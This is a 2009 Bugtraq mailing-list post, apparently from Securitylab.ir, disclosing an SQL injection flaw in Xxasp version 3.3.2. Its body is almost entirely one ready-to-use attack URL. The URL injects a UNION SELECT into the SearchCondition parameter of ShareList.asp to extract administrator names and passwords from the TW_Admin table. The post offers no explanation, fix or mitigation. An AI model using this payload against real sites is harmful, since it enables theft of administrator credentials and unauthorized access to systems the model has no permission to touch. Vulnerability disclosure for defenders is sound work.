[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Xxasp v3.3.2 Sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Xxasp v3.3.2 Sql injection
From: secu_lab_ir@xxxxxxxxx
Date: 30 Nov 2009 09:08:52 -0000

########################## Securitylab.ir ########################
# Application Info:
# Name: Xxasp
# Version: 3.3.2
#################################################################
# Discoverd By: Secu_lab_ir@xxxxxxxxx
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
#===========================================================
# 
http://site.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar'
 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 
from TW_Admin where '1'='1 
#===========================================================
#################################################################
# Security Research Team
###################################################################

Prev by Date: Announce: RFIDIOt-1.0a released - November 2009
Next by Date: Windows packages for BIND9 contain vulnerable MSVC runtime components
Previous by thread: Announce: RFIDIOt-1.0a released - November 2009
Next by thread: Windows packages for BIND9 contain vulnerable MSVC runtime components
Index(es):
- Date
- Thread